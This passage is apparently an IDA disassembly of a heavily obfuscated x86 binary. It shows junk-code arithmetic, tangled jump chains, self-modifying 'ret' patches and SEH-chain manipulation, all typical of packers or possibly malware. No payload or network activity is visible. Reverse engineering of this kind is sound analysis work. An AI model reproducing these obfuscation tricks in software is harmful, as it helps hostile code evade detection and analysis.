		jmp	loc_44DD30
; END OF FUNCTION CHUNK	FOR sub_443360
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B41E

loc_452281:				; CODE XREF: y2kk37jd:004475F6j
					; y2kk37jd:0044A8FEj ...
		jnb	loc_4475FB
		pop	edx
		push	offset loc_458D67

loc_45228D:				; CODE XREF: y2kk37jd:loc_4426D6j
		jmp	loc_4555B3
; END OF FUNCTION CHUNK	FOR sub_45B41E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44619E

loc_452292:				; CODE XREF: sub_44619E:loc_4461B0j
		add	eax, 920CA0DDh
		xchg	eax, [esp+0]
		jmp	loc_44F42D
; END OF FUNCTION CHUNK	FOR sub_44619E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45ADEC

loc_4522A0:				; CODE XREF: sub_45ADEC-2B40j
		cmp	al, 0A4h
		jz	loc_459F87
		jmp	loc_4439CB
; END OF FUNCTION CHUNK	FOR sub_45ADEC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DED9

loc_4522AD:				; CODE XREF: sub_44DED9+DD93j
		jnz	loc_45797B
		jmp	loc_45A434
; END OF FUNCTION CHUNK	FOR sub_44DED9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DBF8

loc_4522B8:				; CODE XREF: sub_44DBF8+D101j
		sub	esi, edi
		sub	ecx, ebp
		jmp	loc_457D8F
; END OF FUNCTION CHUNK	FOR sub_44DBF8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E840

loc_4522C1:				; CODE XREF: sub_44E840:loc_44E853j
		jl	loc_45777F

loc_4522C7:				; CODE XREF: sub_45AAF1-10629j
		jmp	loc_445CFB
; END OF FUNCTION CHUNK	FOR sub_44E840
; ---------------------------------------------------------------------------

loc_4522CC:				; CODE XREF: y2kk37jd:00444998j
		jmp	locret_43CE89
; ---------------------------------------------------------------------------
		and	ecx, ebx
		popf
		cmp	ebp, edx
		jmp	loc_45A3DD
; ---------------------------------------------------------------------------

loc_4522DB:				; CODE XREF: y2kk37jd:0045A477j
		adc	ebp, 4156299h
		popf
		test	ebx, 5FB000C6h
		jmp	loc_459CF7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_4522ED:				; CODE XREF: sub_445226:loc_445547j
		call	sub_4527B4

loc_4522F2:				; CODE XREF: sub_449DAB+Dj
		jmp	sub_442C3E
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
		push	1D3FDB89h
		pop	edx
		sub	edx, 204BB6F7h
		add	edx, 350E736h
		mov	edx, [edx]
		mov	edx, [edx]
		jmp	loc_446557
; ---------------------------------------------------------------------------

loc_452312:				; CODE XREF: y2kk37jd:0045479Aj
		or	ebx, 1DE565Eh
		cmp	ebx, 5BB2E35h
		jmp	loc_45C18F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C851

loc_452323:				; CODE XREF: sub_43C851:loc_447402j
					; sub_44F3F5:loc_45116Bj
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_443522
		jmp	loc_453C61
; END OF FUNCTION CHUNK	FOR sub_43C851
; ---------------------------------------------------------------------------

locret_452334:				; CODE XREF: y2kk37jd:00456176j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440F0C

loc_452335:				; CODE XREF: sub_440F0C+5C38j
		jmp	loc_451E15
; END OF FUNCTION CHUNK	FOR sub_440F0C
; ---------------------------------------------------------------------------

loc_45233A:				; CODE XREF: y2kk37jd:004577AAj
		cdq
		shr	edx, 1
		mov	edx, 0CA771608h
; START	OF FUNCTION CHUNK FOR sub_44610D

loc_452342:				; CODE XREF: sub_44610D:loc_457799j
		xor	edi, 0FE549AE6h

loc_452348:				; CODE XREF: y2kk37jd:loc_441CF3j
		sub	edi, 0C6C39563h
		or	edi, 0A39A9458h
		jmp	loc_4494A8
; END OF FUNCTION CHUNK	FOR sub_44610D
; ---------------------------------------------------------------------------
		cmp	dword ptr [ebp-0Ch], 0
		jz	loc_4517AE
		jmp	loc_446892
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4514DE

loc_452368:				; CODE XREF: sub_4514DE+99C9j
		add	esi, 0BFCCD924h
		jmp	loc_443F3F
; END OF FUNCTION CHUNK	FOR sub_4514DE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445568

loc_452373:				; CODE XREF: sub_445568:loc_458441j
		cmp	dword ptr [ebp-4], 0
		jnz	loc_443F3F
		jmp	loc_44D708
; END OF FUNCTION CHUNK	FOR sub_445568
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44255B

loc_452382:				; CODE XREF: sub_44255B+8j
		jz	loc_451C71
		mov	eax, [ebp-4]
		add	eax, 3Ch
		mov	eax, [eax]
		jmp	loc_44B46A
; END OF FUNCTION CHUNK	FOR sub_44255B
; ---------------------------------------------------------------------------

loc_452395:				; CODE XREF: y2kk37jd:0043B008j
		call	edx
		xor	eax, eax
		mov	[ebp-4], eax
		push	6B726193h
		pop	eax
		xor	eax, 0F931C609h
		jmp	loc_4410C3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447977

loc_4523AD:				; CODE XREF: sub_447977-B94j
		ja	loc_4558B7
		jmp	loc_4507E1
; END OF FUNCTION CHUNK	FOR sub_447977
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4447EA

loc_4523B8:				; CODE XREF: sub_4447EA+54E6j
		jl	loc_44ACF3

loc_4523BE:				; CODE XREF: y2kk37jd:004472E5j
		jmp	loc_454068
; END OF FUNCTION CHUNK	FOR sub_4447EA
; ---------------------------------------------------------------------------
		adc	ecx, esi
		cmp	esi, ebx
		jmp	loc_45ADAB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EE8A

loc_4523CC:				; CODE XREF: sub_43EE8A+Cj
		mov	eax, [esp-4+arg_0]
		push	offset loc_44A10A
		jmp	nullsub_125
; END OF FUNCTION CHUNK	FOR sub_43EE8A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448CAE

loc_4523D9:				; CODE XREF: y2kk37jd:00446E71j
					; sub_448CAE:loc_456DABj
		rol	eax, 1
		call	sub_4551F1

loc_4523E0:				; CODE XREF: sub_458FC0-26DAj
		jmp	loc_440C51
; END OF FUNCTION CHUNK	FOR sub_448CAE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AFF6

loc_4523E5:				; CODE XREF: sub_44AFF6+9681j
		jmp	loc_448875
; END OF FUNCTION CHUNK	FOR sub_44AFF6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4502C2

loc_4523EA:				; CODE XREF: sub_4502C2-B37j
		jmp	loc_456216
; END OF FUNCTION CHUNK	FOR sub_4502C2
; ---------------------------------------------------------------------------
		test	ecx, eax
		jmp	loc_44468D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447E3E

loc_4523F6:				; CODE XREF: sub_447E3E:loc_45BA02j
		adc	edx, 88063AE1h
		jp	loc_43C379
		jmp	loc_456C7A
; END OF FUNCTION CHUNK	FOR sub_447E3E
; ---------------------------------------------------------------------------

loc_452407:				; DATA XREF: sub_44D51F:loc_447DFDo
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0
		jnz	loc_453B82
; START	OF FUNCTION CHUNK FOR sub_445226

loc_452413:				; CODE XREF: sub_445226:loc_44E2EFj
		mov	eax, [ebp-8]

loc_452416:				; CODE XREF: y2kk37jd:0044D7FEj
		call	sub_453B77
; END OF FUNCTION CHUNK	FOR sub_445226
; START	OF FUNCTION CHUNK FOR sub_45BEC4

loc_45241B:				; CODE XREF: sub_45BEC4+Aj
		jmp	nullsub_417
; END OF FUNCTION CHUNK	FOR sub_45BEC4
; ---------------------------------------------------------------------------
		push	ecx
		jmp	loc_442C04
; ---------------------------------------------------------------------------

loc_452426:				; CODE XREF: y2kk37jd:00441D05j
		jp	loc_45616B
		or	edi, 0A5A07EFAh
		jmp	loc_43EFD6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D5C1

loc_452437:				; CODE XREF: sub_43D5C1+1F06j
		push	offset loc_44A464
		jmp	loc_447EBC
; END OF FUNCTION CHUNK	FOR sub_43D5C1

; =============== S U B	R O U T	I N E =======================================



sub_452441	proc near		; CODE XREF: sub_44C500:loc_44C505j
					; sub_44D61Cp ...

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00440111 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004526D2 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00455258 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004579BC SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0045C533 SIZE 0000000E BYTES

		xchg	ebp, [esp+0]
		mov	edx, ebp
		pop	ebp
		js	loc_4579BC
		mov	eax, [esp-4+arg_0]
		push	eax
		mov	eax, edx
		jmp	loc_45C533
sub_452441	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_452458	proc near		; CODE XREF: y2kk37jd:00447D05j
					; sub_4514CE+Bp

; FUNCTION CHUNK AT 00443481 SIZE 00000012 BYTES

		xchg	eax, [esp+0]
		pop	eax
		mov	[ebp-1Ch], eax
		inc	dword ptr [ebp-20h]
		jmp	loc_443481
sub_452458	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D302

loc_452467:				; CODE XREF: sub_44D302:loc_456F9Dj
		cmp	dword ptr [ebp-1Ch], 0Fh
		jnz	loc_443493
		push	offset loc_441480
		jmp	nullsub_198
; END OF FUNCTION CHUNK	FOR sub_44D302
; ---------------------------------------------------------------------------

loc_45247B:				; CODE XREF: y2kk37jd:0044D5CDj
		xor	eax, 0FA6770A3h
		call	sub_442C3E
		mov	ds:dword_41E164, eax
		lea	eax, nullsub_519
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_519
; ---------------------------------------------------------------------------
		call	nullsub_17
		jmp	ds:dword_41E168
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45651A

loc_4524A5:				; CODE XREF: sub_45651A+1j
		jmp	loc_45AA2C
; END OF FUNCTION CHUNK	FOR sub_45651A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_4524AA:				; CODE XREF: sub_453867-171ACj
		jmp	loc_443D89
; END OF FUNCTION CHUNK	FOR sub_453867
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_17. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
		cmp	dword ptr [edi+ebp*8-2], 0FFFFFFFFh
		jmp	loc_447D4B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453B0B

loc_4524BA:				; CODE XREF: sub_453B0B-166C1j
		call	sub_44113A
		push	eax
		mov	eax, edx
		xchg	eax, [esp-4+arg_0]
		push	0A3222B7Bh
		xchg	ebp, [esp+0]
		mov	edx, ebp
		pop	ebp
		jmp	loc_441738
; END OF FUNCTION CHUNK	FOR sub_453B0B
; ---------------------------------------------------------------------------

loc_4524D5:				; CODE XREF: y2kk37jd:0044521Bj
		jo	loc_443610

loc_4524DB:				; CODE XREF: y2kk37jd:loc_446551j
		sub	ebx, 9BD4D1F4h
		test	ebx, 2000000h
		jmp	loc_4465A3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C7B9

loc_4524EC:				; CODE XREF: sub_43C7B9+1AC6Fj
		add	eax, 5858638h
		popf
		push	offset sub_4423B4
		jmp	loc_450ABB
; END OF FUNCTION CHUNK	FOR sub_43C7B9
; ---------------------------------------------------------------------------
		jo	loc_4440C6
		sbb	eax, 4B36D7D0h
		jmp	sub_445226
; ---------------------------------------------------------------------------

loc_45250E:				; CODE XREF: y2kk37jd:0045B92Aj
		jnz	loc_45BCFB
		jmp	loc_44F84C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443BAF

loc_452519:				; CODE XREF: sub_443BAF:loc_452ACFj
		jge	loc_44A288

loc_45251F:				; CODE XREF: y2kk37jd:00451CA9j
		jmp	loc_43B35D
; END OF FUNCTION CHUNK	FOR sub_443BAF
; ---------------------------------------------------------------------------
		mov	ebp, [eax]
		jmp	loc_44A278
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B37E

loc_45252B:				; CODE XREF: sub_43B37E+206FDj
		pop	ecx
		shl	eax, 7

loc_45252F:				; CODE XREF: y2kk37jd:0043FFCFj
		mov	edx, [ebp+8]
		mov	edx, [edx-8]
		or	edx, 40h
		or	eax, edx
		mov	edx, [ebp+8]
		mov	[edx-8], eax
		jmp	loc_457A9E
; END OF FUNCTION CHUNK	FOR sub_43B37E

; =============== S U B	R O U T	I N E =======================================



sub_452545	proc near		; DATA XREF: y2kk37jd:004568F1o
		lea	eax, nullsub_321
		mov	byte ptr [eax],	0C3h
		jmp	loc_45A493
sub_452545	endp

; ---------------------------------------------------------------------------

loc_452553:				; CODE XREF: y2kk37jd:0044E593j
		mov	eax, [esp]
		push	edi
		mov	edi, edx
		xchg	edi, [esp]
		push	edx
		push	6A6BEBADh
		jmp	loc_4550A6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440337

loc_452567:				; CODE XREF: sub_440337+6904j
		cdq
; END OF FUNCTION CHUNK	FOR sub_440337

; =============== S U B	R O U T	I N E =======================================



sub_452568	proc near		; CODE XREF: sub_440337:loc_457849j

var_C		= dword	ptr -0Ch
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0045845D SIZE 00000007 BYTES

		push	ebx
		mov	ebx, eax
		xchg	ebx, [esp+4+var_4]
		lea	eax, dword_441120
		jmp	loc_45845D
sub_452568	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_452579:				; CODE XREF: y2kk37jd:00441169j
		popf

loc_45257A:				; CODE XREF: y2kk37jd:00453950j
		add	edi, 8502D814h
		add	edi, ecx
		add	edi, 842D456Dh
		mov	[edi], eax
		pop	edi
		pop	ecx
		xor	eax, eax
		jmp	locret_457EE2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_452593:				; CODE XREF: sub_445226-8CF4j
		and	ebp, eax

loc_452595:				; CODE XREF: sub_445226:loc_44DC8Fj
		call	sub_456BAC

loc_45259A:				; CODE XREF: sub_45141B+5CDDj
		jmp	loc_44FB9C
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456FFB

loc_45259F:				; CODE XREF: sub_456FFB+10j
		jmp	loc_44ABF8
; END OF FUNCTION CHUNK	FOR sub_456FFB
; ---------------------------------------------------------------------------

loc_4525A4:				; CODE XREF: y2kk37jd:004504A5j
		jmp	loc_43CB50
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED19

loc_4525A9:				; CODE XREF: sub_43ED19:loc_4437D8j
		jnz	loc_44F2A6
		jmp	loc_43C47F
; END OF FUNCTION CHUNK	FOR sub_43ED19
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447659

loc_4525B4:				; CODE XREF: sub_447659+Aj
		xchg	ebp, [esp+0]
		mov	eax, ebp
		pop	ebp
		xor	eax, 7D9D980Ah

loc_4525C0:				; CODE XREF: y2kk37jd:loc_444525j
		add	eax, 0CE30A643h
		jmp	loc_4451ED
; END OF FUNCTION CHUNK	FOR sub_447659
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445568

loc_4525CB:				; CODE XREF: sub_445568:loc_455F0Cj
		jnz	loc_454CA0
		jmp	loc_455C08
; END OF FUNCTION CHUNK	FOR sub_445568
; ---------------------------------------------------------------------------

loc_4525D6:				; DATA XREF: sub_450203:loc_43CC86o
		push	edi
		mov	edi, edx
		xchg	edi, [esp]
		push	eax
		call	sub_445BE8

loc_4525E2:				; CODE XREF: y2kk37jd:0043E200j
		jmp	locret_44228C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F3F5

loc_4525E7:				; CODE XREF: sub_44F3F5:loc_44F403j
		push	415D8502h
		pop	esi
		rol	esi, 0Ah
		cmp	esi, 0D71692Bh
		jmp	loc_44E5DB
; END OF FUNCTION CHUNK	FOR sub_44F3F5
; ---------------------------------------------------------------------------
		not	eax

loc_4525FD:				; CODE XREF: y2kk37jd:0044067Ej
		jmp	loc_43EAA2
; ---------------------------------------------------------------------------
		xchg	ebp, ebx
		or	eax, edi
		jmp	sub_444C79
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4595D8

loc_45260B:				; CODE XREF: sub_4595D8-18887j
		not	ecx
		shr	ebp, 0Bh
		jmp	loc_459F06
; END OF FUNCTION CHUNK	FOR sub_4595D8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CDD5

loc_452615:				; CODE XREF: sub_44CDD5-4D9Cj
		jnp	loc_459BA9
		ror	ebx, 9
		jmp	loc_44CD2A
; END OF FUNCTION CHUNK	FOR sub_44CDD5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F2F2

loc_452623:				; CODE XREF: sub_43F2F2+12963j
		jno	loc_44C18F
		mov	edi, [esi]
		mov	[ecx], ebx
		shr	ecx, 5
		jmp	loc_44EF5C
; END OF FUNCTION CHUNK	FOR sub_43F2F2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AC89

loc_452635:				; CODE XREF: sub_44AC89+6765j
		xor	ebp, ecx

loc_452637:				; CODE XREF: sub_44AC89:loc_45A5E5j
		pop	large dword ptr	fs:0
		add	esp, 4
		push	608133F2h
		xchg	ebx, [esp-8+arg_4]
		mov	eax, ebx
		jmp	loc_4593A8
; END OF FUNCTION CHUNK	FOR sub_44AC89
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_148. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45709E

loc_452651:				; CODE XREF: sub_45709E+18j
		jmp	loc_44D682
; END OF FUNCTION CHUNK	FOR sub_45709E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E2D2

loc_452656:				; CODE XREF: sub_444DF4-91FFj
					; sub_43E2D2:loc_43E2DAj ...
		mov	al, 1
		jmp	loc_454274
; END OF FUNCTION CHUNK	FOR sub_43E2D2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4436C1

loc_45265D:				; CODE XREF: sub_444DF4-287Ej
					; sub_4436C1+Cj
		inc	dword ptr [ebp-4]
		jmp	loc_444DFD
; END OF FUNCTION CHUNK	FOR sub_4436C1

; =============== S U B	R O U T	I N E =======================================



sub_452665	proc near		; CODE XREF: sub_452A89:loc_45C407p

arg_8		= dword	ptr  0Ch

; FUNCTION CHUNK AT 0044BB5D SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0045C623 SIZE 00000005 BYTES

		call	sub_444F61
		push	ecx
		jmp	loc_45C623
sub_452665	endp

; ---------------------------------------------------------------------------

loc_452670:				; CODE XREF: y2kk37jd:loc_446DF0j
		pop	edx
		rol	edx, 0Ch
		add	edx, 90BFAA14h
		mov	[edx], eax
		jmp	loc_456C06
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BD0D

loc_452681:				; CODE XREF: sub_43BD0D+6C09j
		pop	edx
		ror	eax, 1
		jnb	loc_43E900
		add	eax, 4152C517h
		jmp	loc_44228D
; END OF FUNCTION CHUNK	FOR sub_43BD0D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455F45

loc_452695:				; CODE XREF: sub_455F45:loc_45BB4Bj
		jmp	ds:off_41E158
; END OF FUNCTION CHUNK	FOR sub_455F45
; ---------------------------------------------------------------------------

loc_45269B:				; CODE XREF: y2kk37jd:004471A8j
		jmp	locret_446C4D

; =============== S U B	R O U T	I N E =======================================



sub_4526A0	proc near		; CODE XREF: sub_457468-12C25j
					; sub_4526A0:loc_447569j ...

; FUNCTION CHUNK AT 0043D6CB SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0043E320 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00440BE6 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00441D7D SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00444848 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00447569 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451DB8 SIZE 00000010 BYTES

		pop	edx
		jb	loc_444848
		mov	eax, [esp+0]
		push	edx
		push	edx
		push	0AEA60C5Fh
		pop	edx
		jmp	loc_43D6CB
sub_4526A0	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_4526B7	proc near		; CODE XREF: sub_44B03F-F17Dp
					; sub_43C335+668p ...

; FUNCTION CHUNK AT 00459486 SIZE 00000005 BYTES

		push	ebp
		call	sub_452A89

loc_4526BD:				; CODE XREF: sub_43C2D9+1BDA5j
		jmp	loc_459486
sub_4526B7	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445BB5

loc_4526C2:				; CODE XREF: sub_445BB5+8j
		jmp	nullsub_128
; END OF FUNCTION CHUNK	FOR sub_445BB5
; ---------------------------------------------------------------------------
		jnp	loc_44B29A
; START	OF FUNCTION CHUNK FOR sub_451634

loc_4526CD:				; CODE XREF: sub_451634-F245j
		jmp	sub_456D3F
; END OF FUNCTION CHUNK	FOR sub_451634
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452441

loc_4526D2:				; CODE XREF: sub_452441:loc_440111j
		call	sub_45AAD1
		mov	eax, 0EFFDE014h
		call	sub_44113A
		mov	ds:off_41E020, eax
		push	offset sub_458975
		jmp	loc_455258
; END OF FUNCTION CHUNK	FOR sub_452441
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4408B9

loc_4526F1:				; CODE XREF: sub_4408B9+1301Ej
		mov	edx, [esp-4+arg_0]
		push	ecx
		mov	ecx, eax
		xchg	ecx, [esp+0]
		jmp	loc_445091
; END OF FUNCTION CHUNK	FOR sub_4408B9
; ---------------------------------------------------------------------------
		and	esi, ebp
		jmp	sub_4436FA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B814

loc_452706:				; CODE XREF: sub_44B814:loc_4408B4j
		jnz	loc_442403
		jmp	loc_458A5D
; END OF FUNCTION CHUNK	FOR sub_44B814
; ---------------------------------------------------------------------------
		adc	esi, 0B6A22ABCh
		jmp	sub_44B836
; ---------------------------------------------------------------------------

locret_45271C:				; CODE XREF: y2kk37jd:loc_449421j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4574B7

loc_45271D:				; CODE XREF: sub_4574B7+3j
		jmp	sub_440F56
; END OF FUNCTION CHUNK	FOR sub_4574B7
; ---------------------------------------------------------------------------

loc_452722:				; CODE XREF: y2kk37jd:0044C0EDj
		jmp	loc_45A1CE
; ---------------------------------------------------------------------------

loc_452727:				; CODE XREF: y2kk37jd:0044B332j
		jmp	loc_44C0CD
; ---------------------------------------------------------------------------

loc_45272C:				; CODE XREF: y2kk37jd:0043CEB6j
		jmp	sub_440CD1
; ---------------------------------------------------------------------------
		jnb	loc_445153
		jmp	sub_43FE51
; ---------------------------------------------------------------------------

loc_45273C:				; CODE XREF: y2kk37jd:0045A4B5j
		jge	loc_43DEDF
		rol	eax, 1Bh
		jmp	loc_43DEDA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455B08

loc_45274A:				; CODE XREF: sub_455B08+11j
		shr	edx, 3
		mov	ecx, ds:dword_4516B8
		movzx	edx, byte ptr [ecx+edx]
		and	eax, edx
		jz	loc_44F53D
		jmp	loc_4588D0
; END OF FUNCTION CHUNK	FOR sub_455B08
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453B0B

loc_452764:				; CODE XREF: sub_453B0B-13C88j
		and	eax, 29D86326h
		add	eax, 0F6B430DDh
		xchg	eax, [esp+0]
		jmp	sub_43F618
; END OF FUNCTION CHUNK	FOR sub_453B0B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B0D0

loc_452778:				; CODE XREF: sub_44B0D0:loc_43DE81j
		popf
		jp	loc_43B14F
		jmp	loc_43BAC2
; END OF FUNCTION CHUNK	FOR sub_44B0D0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4514DE

loc_452784:				; CODE XREF: sub_4514DE:loc_43D2F7j
		pop	edi
		and	edi, 0A1CAC76Fh
		jnz	loc_44E019
		mov	ebp, eax
		mov	eax, 2F5853DBh
		jmp	loc_44E019
; END OF FUNCTION CHUNK	FOR sub_4514DE
; ---------------------------------------------------------------------------

loc_45279D:				; CODE XREF: y2kk37jd:0043D889j
		jnp	loc_4484E0
		or	edx, 0FB378594h
		jge	loc_43D12C
		jmp	loc_447552

; =============== S U B	R O U T	I N E =======================================



sub_4527B4	proc near		; CODE XREF: sub_445226:loc_4522EDp
					; y2kk37jd:0045ADDDj

arg_0		= dword	ptr  4

		xchg	edx, [esp+0]
		pop	edx
		add	edx, 4045548Ah
		xchg	edx, [esp-4+arg_0]
		jmp	sub_4526B7
sub_4527B4	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_4527C6:				; CODE XREF: sub_4411C3+5E45j
		jno	loc_43E3C3
		not	ebp
		jz	loc_45043B
		jmp	loc_453248
; END OF FUNCTION CHUNK	FOR sub_4411C3
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_107. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4508FD

loc_4527DA:				; CODE XREF: sub_4508FD+6j
		jmp	loc_452FF9
; END OF FUNCTION CHUNK	FOR sub_4508FD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B508

loc_4527DF:				; CODE XREF: sub_44B508+CB2j
		jmp	loc_44D22F
; END OF FUNCTION CHUNK	FOR sub_44B508
; ---------------------------------------------------------------------------

loc_4527E4:				; CODE XREF: y2kk37jd:00442192j
		jmp	loc_44D6DD
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_171. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456809

loc_4527EA:				; CODE XREF: sub_456809-1A6FBj
		jmp	nullsub_201
; END OF FUNCTION CHUNK	FOR sub_456809
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_4527EF:				; CODE XREF: sub_445226:loc_445508j
		add	esi, 0B35E023Ah
		xchg	esi, [esp+0]
		jmp	loc_4455CB
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
		jl	loc_43F59F
		jmp	sub_43D6A6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4552EB

loc_452808:				; CODE XREF: sub_4552EB+BBEj
		or	edi, 0EB73389Dh
		mov	edx, 71A63098h
		sub	edx, 9E9179B1h

loc_452819:				; CODE XREF: sub_4552EB+BB2j
		or	eax, 5989AB69h
		add	eax, 0A4B3FF5Fh
		mov	eax, [eax]
		or	eax, eax
		jmp	loc_442281
; END OF FUNCTION CHUNK	FOR sub_4552EB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45689F

loc_45282E:				; CODE XREF: sub_45689F:loc_4568AAj
		xor	edx, 853E9801h
		test	edx, 8000000h
		jmp	loc_44571A
; END OF FUNCTION CHUNK	FOR sub_45689F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C865

loc_45283F:				; CODE XREF: sub_43C865+D669j
		jnz	loc_44D882

loc_452845:				; CODE XREF: y2kk37jd:00457BB0j
		jmp	loc_458287
; END OF FUNCTION CHUNK	FOR sub_43C865
; ---------------------------------------------------------------------------
		ror	eax, 0Ch
		jmp	loc_449403
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_249. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_452853:				; CODE XREF: y2kk37jd:0043D677j
		jb	loc_441CAA
		cdq
		jmp	loc_440BC6

; =============== S U B	R O U T	I N E =======================================



sub_45285F	proc near		; CODE XREF: sub_448949j
					; DATA XREF: sub_44AAA1:loc_44893Fo
		cmp	dword ptr [ebp-10h], 2
		jnz	loc_44F7BC
		mov	eax, [ebp+8]
		or	dword ptr [eax-8], 8
		jmp	loc_44F7BC
sub_45285F	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4492F7

loc_452875:				; CODE XREF: sub_4492F7-2579j
					; sub_4492F7+Ej
		cmp	dword ptr [ebp-1Ch], 67h
		jnz	loc_446D8F
		jmp	loc_446A3D
; END OF FUNCTION CHUNK	FOR sub_4492F7

; =============== S U B	R O U T	I N E =======================================



sub_452884	proc near		; DATA XREF: sub_4543EF+7o

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043EBB8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044806C SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0045524C SIZE 0000000B BYTES

		mov	eax, [esp+0]
		push	ebx
